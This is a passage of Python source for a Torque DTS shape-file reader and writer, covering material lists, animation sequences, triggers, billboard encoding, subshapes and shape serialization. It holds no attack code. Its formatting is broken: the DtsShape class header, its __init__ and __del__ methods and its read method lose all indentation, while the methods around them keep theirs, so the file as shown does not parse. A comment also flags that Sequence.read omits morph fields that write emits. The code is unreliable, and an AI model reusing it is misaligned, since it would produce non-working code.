    Additive = 0x00000008
    Subtractive = 0x00000010
    SelfIlluminating = 0x00000020
    NeverEnvMap = 0x00000040
    NoMipMap = 0x00000080
    MipMapZeroBorder = 0x00000100
    IFLMaterial = 0x08000000
    IFLFrame = 0x10000000
    DetailMap = 0x20000000
    BumpMap = 0x40000000
    ReflectanceMap = 0x80000000
    AuxiliaryMask = 0xF0000000
    def __init__(self, na=0, fl=0, refl=-1, bum=-1, det=-1, dets=1.0, reflc=0):
        # name is the texture name itself: materials don't use the DTS string table.
        # flags holds the bit constants above; reflectance/bump/detail are map
        # indices; detailScale scales the detail map; reflection is its amount.
        (self.name, self.flags, self.reflectance, self.bump,
         self.detail, self.detailScale, self.reflection) = (na, fl, refl, bum,
                                                            det, dets, reflc)
# Decal Class
class Decal:
    """A DTS decal: a run of consecutive meshes attached to an object."""
    def __init__(self, na, nm, fm, ob=-1, sb=-1):
        # Name index, mesh count, first mesh index, owning object and sibling.
        (self.name, self.numMeshes, self.firstMesh,
         self.object, self.sibling) = (na, nm, fm, ob, sb)
# MaterialList class
class MaterialList:
    """Ordered list of dMaterial entries plus DTS (de)serialization.

    On-disk layout: version byte, S32 count, then length-prefixed name
    strings, then one array per property (flags, reflectance, bump, detail,
    detailScale, reflection), each written for every material in order.
    """
    version = 1  # Version of the dts material list
    def __init__(self):
        self.materials = []
    def __del__(self):
        while len(self.materials) != 0:
            del self.materials[0]
        del self.materials
    def materialExists(self, name):
        """Return True if a material with the given name is present."""
        for m in self.materials:
            if m.name == name:
                return True
        return False
    def findMaterial(self, name):
        """Return the index of the named material, or None if absent."""
        Torque_Util.dump_writeln("Find Material %d " % len(self.materials) + name)
        for m in range(0, len(self.materials)):
            Torque_Util.dump_writeln("Material %d " % m + self.materials[m].name )
            if self.materials[m].name == name:
                return m
        return None
    def get(self, no):
        """Return material number `no`, or None when out of range."""
        if no >= len(self.materials): return None
        return self.materials[no]
    def add(self, mt):
        """Append a material and return its index in the list."""
        self.materials.append(mt)
        return len(self.materials) - 1
    def size(self):
        return len(self.materials)
    def printInfo(self):
        """Dump the whole list to the Torque_Util log."""
        Torque_Util.dump_writeln("Material List, Version %d" % self.version)
        Torque_Util.dump_writeln("Contains : %d Materials" % len(self.materials))
        for m in self.materials:
            Torque_Util.dump_writeln("Material : %s" % m.name)
            Torque_Util.dump_writeln("-Flags : %d" % m.flags)
            Torque_Util.dump_writeln("-Reflectance : %d" % m.reflectance)
            Torque_Util.dump_writeln("-Bump : %d" % m.bump)
            Torque_Util.dump_writeln("-Detail : %d" % m.detail)
            Torque_Util.dump_writeln("-detailScale : %f" % m.detailScale)
            Torque_Util.dump_writeln("-reflection : %f" % m.reflection)
    def read(self, fs):
        """Read the material list from binary stream `fs`."""
        ver = struct.unpack('<b', fs.read(calcsize('<b')))[0] # U8
        if self.version == ver:
            sz = struct.unpack('<i', fs.read(calcsize('<i')))[0] # S32
            # Read strings, adding a material for each one
            for cnt in range(0, sz):
                ss = struct.unpack('<b', fs.read(calcsize('<b')))[0] # U8 length prefix
                # FIX: read the name bytes directly; array('c') and
                # tostring() no longer exist in Python 3.
                self.materials.append(dMaterial(fs.read(ss)))
            # Read the rest of the Material properties (ref and ds is F32, rest is U32)
            for mat in self.materials:
                mat.flags = struct.unpack('<I', fs.read(calcsize('<I')))[0] # U32
            for mat in self.materials:
                mat.reflectance = struct.unpack('<I', fs.read(calcsize('<I')))[0] # U32
            for mat in self.materials:
                mat.bump = struct.unpack('<I', fs.read(calcsize('<I')))[0] # U32
            for mat in self.materials:
                mat.detail = struct.unpack('<I', fs.read(calcsize('<I')))[0] # U32
            for mat in self.materials:
                mat.detailScale = struct.unpack('<f', fs.read(calcsize('<f')))[0] # F32
            for mat in self.materials:
                mat.reflection = struct.unpack('<f', fs.read(calcsize('<f')))[0] # F32
        else:
            Torque_Util.dump_writeErr("Error! Version mismatch (%d, should be %d)" % (ver, self.version))
    def write(self, fs):
        """Write the material list to binary stream `fs`."""
        fs.write(struct.pack('<b', self.version)) # Version
        # name, flags, refl, bump, det, detsca, reflecion (in seperate arrays)
        # Names
        fs.write(struct.pack('<i', len(self.materials))) # S32
        for mat in self.materials:
            # Best-effort re-encode of the raw name bytes to UTF-8.  NOTE:
            # 'mbcs' only exists on Windows, so the 'idna' fallback (or the
            # raw name) is used elsewhere.
            success = False
            try:
                mn = mat.name.decode("mbcs").encode("utf_8")
                success = True
            except:
                pass
            if not success:
                try:
                    mn = mat.name.decode("idna").encode("utf_8")
                    success = True
                except:
                    pass
            if not success: mn = mat.name
            # FIX: normalize to bytes so the length prefix matches the bytes
            # actually written, and write them directly -- array.fromstring()
            # and tofile() were removed in Python 3.
            if not isinstance(mn, bytes):
                mn = mn.encode("utf_8")
            fs.write(struct.pack('<b', len(mn))) # Length of Name
            fs.write(mn)
        for mat in self.materials:
            fs.write(struct.pack('I', mat.flags))
        for mat in self.materials:
            fs.write(struct.pack('i', mat.reflectance))
        for mat in self.materials:
            fs.write(struct.pack('i', mat.bump))
        for mat in self.materials:
            fs.write(struct.pack('i', mat.detail))
        for mat in self.materials:
            fs.write(struct.pack('f', mat.detailScale))
        for mat in self.materials:
            fs.write(struct.pack('f', mat.reflection))
# IFLMaterial class
class IflMaterial:
    """An animated (IFL) material reference inside a DTS shape."""
    def __init__(self, na=0, sl=0, ff=0, ti=0, nf=0):
        # String-table index of the material name.
        self.name = na
        # Material slot this IFL entry drives.
        self.slot = sl
        # First frame index, sequence duration, and total frame count.
        self.firstFrame = ff
        self.time = ti
        self.numFrames = nf
# DetailLevel class
class DetailLevel:
    """One level of detail of a DTS shape."""
    def __init__(self, na=0, ss=0, od=0, sz=0.0, ae=-1, me=-1, pc=0):
        # name: string-table index; subshape: owning subshape number;
        # objectDetail: which mesh each object draws; size: minimum pixel
        # size (F32); avgError/maxError: alternate detail scheme errors;
        # polyCount: polygon count of all meshes in this level.
        (self.name, self.subshape, self.objectDetail, self.size,
         self.avgError, self.maxError, self.polyCount) = (na, ss, od, sz,
                                                          ae, me, pc)
# Encodes billboard data
def encodeBillBoard(equator, polar, polarangle, dl, dim, includepoles):
    """Pack billboard detail-level properties into a single 32-bit value.

    Typical call: encodeBillBoard(2, 2, 45, 0, 128, 0).

    equator       -- number of equator steps (bits 0..6)
    polar         -- number of polar steps (bits 7..12)
    polarangle    -- threshold angle in degrees (max 45) before showing the
                     polar view; quantized into bits 13..18 (45 deg -> 32)
    dl            -- detail level to take the picture of (bits 19..22)
    dim           -- image dimensions, width+height (bits 23..30, max 128)
    includepoles  -- whether to take shots of top and bottom (bit 31)
    """
    val = 0
    val |= (equator & 0x7F)  # bits 0..6
    # FIX: the original packed (val & 0x3F) here, which ignored the 'polar'
    # argument entirely; bits 7..12 are the polar step count.
    val |= (polar & 0x3F) << 7  # bits 7..12
    # Convert the degree threshold to radians...
    polarAngle = (float(polarangle) * 3.14159265358979323846) / 180.0
    # ...then quantize into 1/64th steps of pi/2 (so 45 degrees packs as 32).
    polarAngle = int(round(((polarAngle) / (1.0 / 64.0) / 3.14159265358979323846 / 0.5)))
    if polarAngle > 32: polarAngle = 32  # cannot be higher than 32
    val |= (polarAngle & 0x3F) << 13  # bits 13..18
    val |= (dl & 0x0F) << 19  # 19..22
    val |= (dim & 0xFF) << 23  # 23..30
    if includepoles:
        val |= 1 << 31  # true
    return val
# Subshape class - DTS subshape
class SubShape:
    """A contiguous slice of nodes, objects and decals forming one subshape."""
    def __init__(self, fn=0, fo=0, fd=0, nn=0, no=0, nd=0):
        # First indices of this subshape's node, object and decal ranges.
        self.firstNode, self.firstObject, self.firstDecal = fn, fo, fd
        # Element counts of those ranges.
        self.numNodes, self.numObjects, self.numDecals = nn, no, nd
        # Unused by the format; always written as 0.
        self.firstTranslucent = 0
# ObjectState class
class ObjectState:
    """Per-keyframe state of one object inside a sequence."""
    def __init__(self, vs=1.0, fr=0, mf=0):
        # vis: object alpha in 0..1; frame: which mesh frame to show
        # (vertsPerFrame*frame .. vertsPerFrame*(frame+1)); matFrame: IFL
        # material frame.
        self.vis, self.frame, self.matFrame = vs, fr, mf
# Trigger class (used for footsteps, etc)
class Trigger:
    """A sequence trigger (used for footsteps, etc.).

    state is a plain integer holding the trigger number; bits 31 and 30 are
    the StateOn and InvertOnReverse flags.
    """
    StateOn = 1 << 31
    InvertOnReverse = 1 << 30
    # FIX: '1 << (30) - 1' parses as '1 << 29' because '-' binds tighter
    # than '<<'; the mask for the 30 usable state bits is (1 << 30) - 1.
    StateMask = (1 << 30) - 1
    def __init__(self, st=0, on=True, ps=0.0, revert=False):
        self.pos = ps  # position of the trigger within the sequence
        if (st <= 0) or (st > 32):
            Torque_Util.dump_writeWarning("Warning : Invalid Trigger state (%d)" % st)
        # st -= 1 # 0..31
        # self.state = 1 << st
        # this is just a plain integer, only bits 31 and 30 are used as flags.
        self.state = st
        if on: self.state |= self.StateOn
        if revert: self.state |= self.InvertOnReverse
# The Morph Mesh Class
class Morph:
    """Initial state of one morph target in the shape."""
    def __init__(self, na=0, initial=0.0):
        # String-table name index and the morph's initial value.
        self.nameIndex, self.initialValue = na, initial
# Get the highest number from an array (unsigned)
def highest(arr):
    """Return the largest value in arr, floored at 0 (values are unsigned)."""
    top = 0
    for value in arr:
        top = value if value > top else top
    return top
# Sequence class
class Sequence:
    """A DTS animation sequence.

    Holds keyframe counts, indices of the sequence's base frames into the
    shape-level frame arrays, and the per-node / per-object "matters" boolean
    lists that record which nodes and objects the sequence animates.
    """
    # flags
    UniformScale = 0x0001
    AlignedScale = 0x0002
    ArbitraryScale = 0x0004
    Blend = 0x0008
    Cyclic = 0x0010
    MakePath = 0x0020
    IFLInit = 0x0040
    HasTranslucency = 0x0080
    def __init__(self, na=0, fl=0, nk=0, du=0.0, pri=0, fg=-1, ng=0, br=-1, bt=-1, bs=-1, bos=-1, bds=-1, ft=-1, nt=0,
                 tb=0, bm=0):
        self.nameIndex = na  # index of the name in the DTS string table
        self.flags = fl  # Flags of sequence
        self.numKeyFrames = nk  # Number of keyframes in sequence
        self.duration = du  # Duration of the sequence in seconds
        self.priority = pri  # Priority of sequence
        self.firstGroundFrame = fg  # Index of first ground frame
        self.numGroundFrames = ng  # Number of ground frames
        self.baseRotation = br  # Index of first rotation frame
        self.baseTranslation = bt  # Index of first translation frame
        self.baseScale = bs  # Index of first scale frame
        self.baseObjectState = bos  # Index of first object state
        self.baseDecalState = bds  # Index of first decal state
        self.firstTrigger = ft  # Index of first trigger
        self.numTriggers = nt  # Number of triggers
        self.toolBegin = tb  # ToolBegin
        self.baseMorph = bm  # Morph meshes
        self.matters_rotation = []  # Boolean list of nodes used in sequence with rotation frames
        self.matters_translation = []  # Boolean list of nodes used in sequence with translation frames
        self.matters_scale = []  # Boolean list of nodes used in sequence with scale frames
        self.matters_decal = []  # Boolean list of decals used in sequence
        self.matters_ifl = []  # Boolean list of IFL materials used in sequence
        self.matters_vis = []  # Boolean list of object states.visibility used in sequence
        self.matters_frame = []  # Boolean list of object states.frame used in sequence
        self.matters_matframe = []  # Boolean list of object states.matframe used in sequence
        self.matters_morph = []  # Boolean list of morphs
    def __del__(self):
        # Explicitly drop the (potentially large) membership lists.
        del self.matters_rotation
        del self.matters_translation
        del self.matters_scale
        del self.matters_decal
        del self.matters_ifl
        del self.matters_vis
        del self.matters_frame
        del self.matters_matframe
        del self.matters_morph
    def read(self, fs, version):
        """Read the sequence header and matters sets from stream `fs`.

        NOTE(review): the version>24 baseMorph / matters_morph reads are
        commented out here while write() still emits them -- confirm which
        DTS version this reader is expected to consume.
        """
        self.nameIndex = struct.unpack('<i', fs.read(calcsize('<i')))[0] # S32
        self.flags = struct.unpack('<I', fs.read(calcsize('<I')))[0] # U32
        self.numKeyFrames = struct.unpack('<i', fs.read(calcsize('<i')))[0] # S32
        self.duration = struct.unpack('<f', fs.read(calcsize('<f')))[0] # F32
        self.priority = struct.unpack('<i', fs.read(calcsize('<i')))[0] # S32
        self.firstGroundFrame = struct.unpack('<i', fs.read(calcsize('<i')))[0] # S32
        self.numGroundFrames = struct.unpack('<i', fs.read(calcsize('<i')))[0] # S32
        self.baseRotation = struct.unpack('<i', fs.read(calcsize('<i')))[0] # S32
        self.baseTranslation = struct.unpack('<i', fs.read(calcsize('<i')))[0] # S32
        self.baseScale = struct.unpack('<i', fs.read(calcsize('<i')))[0] # S32
        self.baseObjectState = struct.unpack('<i', fs.read(calcsize('<i')))[0] # S32
        self.baseDecalState = struct.unpack('<i', fs.read(calcsize('<i')))[0] # S32
        self.firstTrigger = struct.unpack('<i', fs.read(calcsize('<i')))[0] # S32
        self.numTriggers = struct.unpack('<i', fs.read(calcsize('<i')))[0] # S32
        self.toolBegin = struct.unpack('<f', fs.read(calcsize('<f')))[0] # F32
        # if version > 24:
        # self.baseMorph = struct.unpack('<i', fs.read(calcsize('<i')))[0] #S32
        # Read integer sets
        self.matters_rotation = readIntegerSet(fs)
        self.matters_translation = readIntegerSet(fs)
        self.matters_scale = readIntegerSet(fs)
        self.matters_decal = readIntegerSet(fs)
        self.matters_ifl = readIntegerSet(fs)
        self.matters_vis = readIntegerSet(fs)
        self.matters_frame = readIntegerSet(fs)
        self.matters_matframe = readIntegerSet(fs)
        # if version > 24:
        # self.matters_morph = readIntegerSet(fs)
    def write(self, fs, version, noIndex=False):
        """Write the sequence to stream `fs`.

        noIndex suppresses the leading nameIndex field (used when the caller
        writes names separately); version>24 additionally emits morph data.
        """
        # Write Struct...
        if noIndex == False: # Write Index
            fs.write(struct.pack('<i', self.nameIndex))
        fs.write(struct.pack('<I', self.flags))
        fs.write(struct.pack('<i', self.numKeyFrames))
        fs.write(struct.pack('<f', self.duration))
        fs.write(struct.pack('<i', self.priority))
        fs.write(struct.pack('<i', self.firstGroundFrame))
        fs.write(struct.pack('<i', self.numGroundFrames))
        fs.write(struct.pack('<i', self.baseRotation))
        fs.write(struct.pack('<i', self.baseTranslation))
        fs.write(struct.pack('<i', self.baseScale))
        fs.write(struct.pack('<i', self.baseObjectState))
        fs.write(struct.pack('<i', self.baseDecalState))
        fs.write(struct.pack('<i', self.firstTrigger))
        fs.write(struct.pack('<i', self.numTriggers))
        fs.write(struct.pack('<f', self.toolBegin))
        if version > 24:
            fs.write(struct.pack('<i', self.baseMorph))
        # Write integer sets
        writeIntegerSet(fs, self.matters_rotation)
        writeIntegerSet(fs, self.matters_translation)
        writeIntegerSet(fs, self.matters_scale)
        writeIntegerSet(fs, self.matters_decal)
        writeIntegerSet(fs, self.matters_ifl)
        writeIntegerSet(fs, self.matters_vis)
        writeIntegerSet(fs, self.matters_frame)
        writeIntegerSet(fs, self.matters_matframe)
        if version > 24:
            writeIntegerSet(fs, self.matters_morph)
    # Resizes the matters array, removing 0's
    def clearMatters(self, matter):
        """Shrink `matter` by the number of falsy entries and set the rest True.

        NOTE(review): zeros are counted anywhere in the list but removal is
        from the front -- confirm this matches the intended semantics.
        """
        count = 0
        # Count number of 0's
        for m in matter:
            if not m:
                count += 1
        del matter[:count]
        # Make sure everything is 1
        for m in range(0, len(matter)):
            matter[m] = True
    # Counts nodes used in sequence
    def countNodes(self, countMode=-1):
        """Count animated nodes: countMode 0=rotation, 1=translation,
        2=scale, -1 (default)=nodes animated by any of the three."""
        global_count = 0
        translation_count = 0
        rotation_count = 0
        scale_count = 0
        # NOTE: assumes matters_rotation is the size of the shape's nodes and the other matters_*
        for n in range(0, len(self.matters_rotation)):
            if (countMode == 0) and self.matters_rotation[n]:
                rotation_count += 1
            elif (countMode == 1) and self.matters_translation[n]:
                translation_count += 1
            elif (countMode == 2) and self.matters_scale[n]:
                scale_count += 1
            elif self.matters_rotation[n] or self.matters_translation[n] or self.matters_scale[n]:
                global_count += 1
        if countMode == 0:
            return rotation_count
        elif countMode == 1:
            return translation_count
        elif countMode == 2:
            return scale_count
        else:
            return global_count
    # Returns indexes of nodes used in sequence
    def getNodes(self, countMode=-1):
        """Return node indices used by the sequence.

        countMode 0/1/2 selects rotation/translation/scale only; -1 returns
        the union of all three (the list accumulates across the loops below).
        """
        nodes = []
        for n in range(0, len(self.matters_rotation)):
            if self.matters_rotation[n]:
                if not nodes.__contains__(n): nodes.append(n)
        if countMode == 0:
            return nodes
        elif countMode != -1:
            # A specific non-rotation mode was requested: start over.
            nodes = []
        for n in range(0, len(self.matters_translation)):
            if self.matters_translation[n]:
                if not nodes.__contains__(n): nodes.append(n)
        if countMode == 1:
            return nodes
        elif countMode != -1:
            nodes = []
        for n in range(0, len(self.matters_scale)):
            if self.matters_scale[n]:
                if not nodes.__contains__(n): nodes.append(n)
        if countMode == 2: return nodes
        return nodes
# The rather pointless DecalState class
class DecalState:
    """Frame number of a decal (kept for file-format compatibility)."""
    def __init__(self, fr=0):
        # The decal's frame index.
        self.frame = fr
# Main Shape Class
class DtsShape:
smNumSkipLoadDetails = False
def getNode(self, name):
for n in self.nodes:
if n.name == -1:
continue
if name == self.sTable.get(n.name):
return n
return None
def getNodeIndex(self, name):
for n in range(0, len(self.nodes)):
if self.nodes[n].name == -1:
continue
if name == self.sTable.get(self.nodes[n].name):
return n
return None
def getSequence(self, name):
for s in self.sequences:
if s.nameIndex == -1:
continue
if name == self.sTable.get(s.nameIndex):
return s
return None
def __init__(self):
self.bounds = Box() # Bounds of shape
self.center = Vector(0, 0, 0) # Center
self.tubeRadius = 0 # Shape tube radius (all meshes)
self.radius = 0.0 # Shape radius (all meshes)
self.meshes = [] # Meshes
self.morphs = [] # Morphs
self.morphDefSettings = [] # Morphs (default settings)
self.morphSettings = [] # Morphs (settings)
self.nodes = [] # Nodes (bones)
self.sequences = [] # Sequences
self.triggers = [] # Triggers
self.objects = [] # Objects
self.objectstates = [] # Object States
self.iflmaterials = [] # IFL Materials
self.subshapes = [] # Subshapes
self.detaillevels = [] # Detail Levels
self.decals = [] # Decals
self.decalstates = [] # Decal States
self.materials = MaterialList() # Material List
self.sTable = StringTable() # String Table
self.defaultRotations = [] # Default node rotations
self.defaultTranslations = [] # Default node translations
self.nodeTranslations = [] # Node translations
self.nodeRotations = [] # Node rotations
self.nodeUniformScales = array('f') # Node scales (uniform)
self.nodeAlignedScales = [] # Node scales (aligned)
self.nodeAbitraryScaleFactors = [] # Node scale factors
self.nodeAbitraryScaleRots = [] # Node scale quats
self.groundTranslations = [] # Ground translation frames
self.groundRotations = [] # Ground rotation frames
self.morphs = [] # Morph initial data
self.morphSettings = array('f') # Morph frames
self.alphain = array('f') # Used for detail blending
self.alphaout = array('f') # Used for detail blending
self.mPreviousMerge = []
self.mExportMerge = False
self.mSmallestVisibleSize = 0 # Smallest visible size (approximation)
self.mSmallestVisibleDL = 0
def __del__(self):
clearArray(self.meshes)
del self.nodes
clearArray(self.sequences)
del self.triggers
del self.objects
del self.objectstates
del self.iflmaterials
del self.subshapes
del self.detaillevels
del self.decals
del self.decalstates
del self.materials
del self.defaultRotations
del self.defaultTranslations
del self.nodeTranslations
del self.nodeRotations
del self.nodeUniformScales
del self.nodeAlignedScales
del self.nodeAbitraryScaleFactors
del self.nodeAbitraryScaleRots
del self.groundTranslations
del self.groundRotations
del self.morphs
del self.morphSettings
del self.alphain
del self.alphaout
del self.mPreviousMerge
del self.sTable
    def checkSkip(self, meshNum, curObject, curDecal, skipDL):
        """Return True when mesh `meshNum` belongs to the detail level being
        skipped (`skipDL`).

        Recursively walks the object list (then the decal list) to locate the
        object/decal that owns the mesh, and compares that owner's subshape
        and detail position against the skip detail level.
        """
        # More or less a translation of the C++ code
        # 0 = false, 1 = true
        if skipDL == 0:
            return False # easy out...
        # Skip detail level exists on this subshape
        skipSS = self.detaillevels[skipDL].subshape
        if curObject < len(self.objects):
            start = self.objects[curObject].firstMesh
            if meshNum >= start:
                # We are either from this object, the next object, or a decal
                if meshNum < start + self.objects[curObject].numMeshes:
                    # This Object...
                    if self.subshapes[skipSS].firstObject > curObject:
                        # Haven't reached this subshape yet
                        return True
                    if (len(self.subshapes) == skipSS + 1) or (curObject < self.subshapes[skipSS + 1].firstObject):
                        # curObject is on the subshape of a skip detail...make sure it's after skipDL
                        if meshNum - start < self.detaillevels[skipDL].objectDetail:
                            return True
                        else:
                            return False
                    # if we get here, then curObject occurs on a subShape after skip detail (so keep it)
                    return False
                else:
                    # Mesh belongs to a later object: advance and retry.
                    return self.checkSkip(meshNum, curObject + 1, curDecal, skipDL)
        if curDecal < len(self.decals):
            start = self.decals[curDecal].firstMesh
            if meshNum >= start:
                # we are either from this decal, the next decal, or error
                if meshNum < start + self.decals[curDecal].numMeshes:
                    # this object...
                    if self.subshapes[skipSS].firstDecal > curDecal:
                        # haven't reached this subshape yet
                        return True
                    if (len(self.subshapes) == skipSS + 1) or (curDecal < self.subshapes[skipSS + 1].firstDecal):
                        # curDecal is on subshape of skip detail...make sure it's after skipDL
                        if meshNum - start < self.detaillevels[skipDL].objectDetail:
                            return True
                        else:
                            return False
                    else:
                        # if we get here, then curDecal ocurrs on subShape after skip detail (so keep it)
                        return False
                else:
                    # advance decal, try again
                    return self.checkSkip(meshNum, curObject, curDecal + 1, skipDL)
        return False
    def write(self, dstream):
        """Serialize the shape to *dstream* (a DTS stream writer).

        The order of writes mirrors the engine's TSShape assembly exactly:
        counts first, then bounds, then each vector of records, with a
        ``storeCheck()`` guard value after every section.  Finally the
        buffered streams are flushed and :meth:`write_end` appends the
        sequences and material list to the raw file.
        """
        # In this function, we write to the dstream, flush it, then write_end
        # Write Counts...
        dstream.writes32(len(self.nodes))
        dstream.writes32(len(self.objects))
        dstream.writes32(len(self.decals))
        dstream.writes32(len(self.subshapes))
        dstream.writes32(len(self.iflmaterials))
        dstream.writes32(len(self.nodeRotations))
        dstream.writes32(len(self.nodeTranslations))
        dstream.writes32(len(self.nodeUniformScales))
        dstream.writes32(len(self.nodeAlignedScales))
        dstream.writes32(len(self.nodeAbitraryScaleFactors))  # Both scale's must be same length
        dstream.writes32(len(self.groundRotations))
        dstream.writes32(len(self.objectstates))
        dstream.writes32(len(self.decalstates))
        dstream.writes32(len(self.triggers))
        dstream.writes32(len(self.detaillevels))
        dstream.writeu32(len(self.meshes))
        dstream.writes32(len(self.sTable.strings))
        dstream.writes32(self.mSmallestVisibleSize)  # This is typecasted to F32, but isn't a float when stored
        dstream.writes32(self.mSmallestVisibleDL)
        # Morphs (only present in newer file versions)
        if dstream.DTSVersion > 24:
            # Note: appears to be redundancy here...
            dstream.writes32(len(self.morphs))
            dstream.writes32(len(self.morphs))
            dstream.writes32(len(self.morphSettings))
        dstream.storeCheck()
        # Write Bounds...
        dstream.writef32(self.radius)
        dstream.writef32(self.tubeRadius)
        dstream.writePoint3F(self.center)
        dstream.writeBox(self.bounds)
        dstream.storeCheck()
        # Write Various Vectors...
        # Write Nodes
        for cnt in self.nodes:
            dstream.writeNode(cnt)
        dstream.storeCheck()
        # Write Objects
        for cnt in self.objects:
            dstream.writeObject(cnt)
        dstream.storeCheck()
        # Write Decals
        for cnt in self.decals:
            dstream.writeDecal(cnt)
        dstream.storeCheck()
        # Write Ifl Materials
        for cnt in self.iflmaterials:
            dstream.writeIflMaterial(cnt)
        dstream.storeCheck()
        # Write SubShapes
        # (stored column-wise: all first* arrays, then all num* arrays)
        for shape in self.subshapes:
            # first* and num*
            dstream.writes32(shape.firstNode)
        for shape in self.subshapes:
            dstream.writes32(shape.firstObject)
        for shape in self.subshapes:
            dstream.writes32(shape.firstDecal)
        dstream.storeCheck()
        for shape in self.subshapes:
            dstream.writes32(shape.numNodes)
        for shape in self.subshapes:
            dstream.writes32(shape.numObjects)
        for shape in self.subshapes:
            dstream.writes32(shape.numDecals)
        dstream.storeCheck()
        # Get default translation and rotation...
        for cnt in range(0, len(self.defaultRotations)):  # Same length as default translations
            dstream.writeQuat16(self.defaultRotations[cnt])
            dstream.writePoint3F(self.defaultTranslations[cnt])
        # Get any node sequence data stored in shape
        for cnt in self.nodeTranslations:
            dstream.writePoint3F(cnt)
        for cnt in self.nodeRotations:
            dstream.writeQuat16(cnt)
        dstream.storeCheck()
        # More node sequence data...scale
        for cnt in self.nodeUniformScales:
            dstream.writef32(cnt)
        for cnt in self.nodeAlignedScales:
            dstream.writePoint3F(cnt)
        for cnt in self.nodeAbitraryScaleFactors:
            dstream.writePoint3F(cnt)
        for cnt in self.nodeAbitraryScaleRots:
            dstream.writeQuat16(cnt)
        dstream.storeCheck()
        for cnt in self.groundTranslations:
            dstream.writePoint3F(cnt)
        for cnt in self.groundRotations:
            dstream.writeQuat16(cnt)
        dstream.storeCheck()
        # Object States
        for cnt in self.objectstates:
            dstream.writeObjectState(cnt)
        dstream.storeCheck()
        # Decal States
        for cnt in self.decalstates:
            dstream.writeDecalState(cnt)
        dstream.storeCheck()
        # Frame Triggers
        for cnt in self.triggers:
            dstream.writeTrigger(cnt)
        dstream.storeCheck()
        # Details
        for cnt in self.detaillevels:
            dstream.writeDetailLevel(cnt)
        dstream.storeCheck()
        # Meshes
        for msh in self.meshes:
            dstream.writeu32(int(msh.mtype))  # Write Mesh Type
            msh.write(dstream)
            dstream.storeCheck()
        # Morphs
        if dstream.DTSVersion > 24:
            for morph in self.morphs:
                dstream.writeMorph(morph)
            for morph in self.morphs:
                dstream.writef32(morph.initialValue)
            for morphset in self.morphSettings:
                dstream.writef32(morphset)
            dstream.storeCheck()
        # Names
        for cnt in self.sTable.strings:
            dstream.writeStringt(cnt)
        dstream.storeCheck()
        # ...
        # Flush. Needed here
        dstream.flush()
        self.write_end(dstream)  # And write the rest of the story
    def write_end(self, dstream):
        """Write the trailing, non-buffered section of the file: the
        sequence count and sequences, then the material list, directly to
        the raw file object (``dstream.fs``)."""
        # Write Sequences and Materials HERE
        dstream.fs.write(struct.pack('<i', len(self.sequences)))  # S32
        for seq in self.sequences:
            seq.write(dstream.fs, dstream.DTSVersion)
        # Write Material List
        self.materials.write(dstream.fs)
def read(self, dstream):
# Read in a shape. Calls the mesh read, and soforth
Torque_Util.dump_writeln("Reading in Sequences and Materials")
# First, we need to read in sequences (not in memory buffers, is at end of the file)...
numSequences = struct.unpack('<i', dstream.fs.read(calcsize('<i')))[0] # S32
for seq in range(0, numSequences): # ^^ as usual, this spits out an annoying array
sq = Sequence()
sq.read(dstream.fs, dstream.DTSVersion)
self.sequences.append(sq)
# Read Material List
self.materials.read(dstream.fs)
Torque_Util.dump_writeln("Reading in from streams...")
## >> End of normal file reading <<##
# Get Counts...
numNodes = dstream.reads32() # S32 numNodes = alloc.get32();
numObjects = dstream.reads32() # S32 numObjects = alloc.get32();
numDecals = dstream.reads32() # S32 numDecals = alloc.get32();
numSubShapes = dstream.reads32() # S32 numSubShapes = alloc.get32();
numIflMaterials = dstream.reads32() # S32 numIflMaterials = alloc.get32();
numNodeRots = dstream.reads32() # S32 numNodeRots = alloc.get32();
numNodeTrans = dstream.reads32() # S32 numNodeTrans = alloc.get32();
numNodeUniformScales = dstream.reads32() # S32 numNodeUniformScales = alloc.get32();
numNodeAlignedScales = dstream.reads32() # S32 numNodeAlignedScales = alloc.get32();
numNodeArbitraryScales = dstream.reads32() # S32 numNodeArbitraryScales = alloc.get32();
numGroundFrames = dstream.reads32() # S32 numGroundFrames = alloc.get32();
numObjectStates = dstream.reads32() # S32 numObjectStates = alloc.get32();
numDecalStates = dstream.reads32() # S32 numDecalStates = alloc.get32();
numTriggers = dstream.reads32() # S32 numTriggers = alloc.get32();
numDetails = dstream.reads32() # S32 numDetails = alloc.get32();
numMeshes = dstream.reads32() # S32 numMeshes = alloc.get32();
numNames = dstream.reads32()
self.mSmallestVisibleSize = dstream.reads32() # Not a float
self.mSmallestVisibleDL = dstream.reads32()
skipDL = min(self.mSmallestVisibleDL, self.smNumSkipLoadDetails)
# Morphs
# if dstream.DTSVersion > 24:
# # Note: appears to be redundancy here...
# numMorphs = dstream.reads32()
# numDefMorphs = dstream.reads32()
# if numMorphs != numDefMorphs:
# Torque_Util.dump_writeErr("Error: Morph number mismatch (%d morphs for %d defaults)" % (numMorphs, numDefMorphs))
# return
#
# numMorphSettings = dstream.reads32()
dstream.readCheck()
# get bounds
self.radius = dstream.readf32()
self.tubeRadius = dstream.readf32()
self.center = dstream.readPoint3F()
self.bounds = dstream.readBox()
dstream.readCheck()
# Copy Various Vectors...
# Read in Nodes
for cnt in range(0, numNodes):
self.nodes.append(dstream.readNode())
dstream.readCheck()
# Read in Objects
for cnt in range(0, numObjects):
self.objects.append(dstream.readObject())
dstream.readCheck()
# Read in Decals
for cnt in range(0, numDecals):
self.decals.append(dstream.readDecal())
dstream.readCheck()
# Read in Ifl Materials
for cnt in range(0, numIflMaterials):
self.iflmaterials.append(dstream.readIflMaterial())
dstream.readCheck()
# Read in subShapes
# A tad more complex since the file stores everything seperatly
afirstNode = []
afirstObject = []
afirstDecal = []
anumNodes = []
anumObjects = []
anumDecals = []
for cnt in range(0, numSubShapes):
afirstNode.append(dstream.reads32())
for cnt in range(0, numSubShapes):
afirstObject.append(dstream.reads32())
for cnt in range(0, numSubShapes):
afirstDecal.append(dstream.reads32())
dstream.readCheck()
for cnt in range(0, numSubShapes):
anumNodes.append(dstream.reads32())
for cnt in range(0, numSubShapes):
anumObjects.append(dstream.reads32())
for cnt in range(0, numSubShapes):
anumDecals.append(dstream.reads32())
for cnt in range(0, numSubShapes):
# Finally, add the subshapes
self.subshapes.append(
SubShape(afirstNode[cnt], afirstObject[cnt], afirstDecal[cnt], anumNodes[cnt], anumObjects[cnt],
anumDecals[cnt]))
dstream.readCheck()
# Cleanup
del afirstNode
del afirstObject
del afirstDecal
del anumNodes
del anumObjects
del anumDecals
# No need to read meshIndexList
# Get default translation and rotation...
for cnt in range(0, numNodes):
self.defaultRotations.append(dstream.readQuat16())
self.defaultTranslations.append(dstream.readPoint3F())
# Get any node sequence data stored in shape
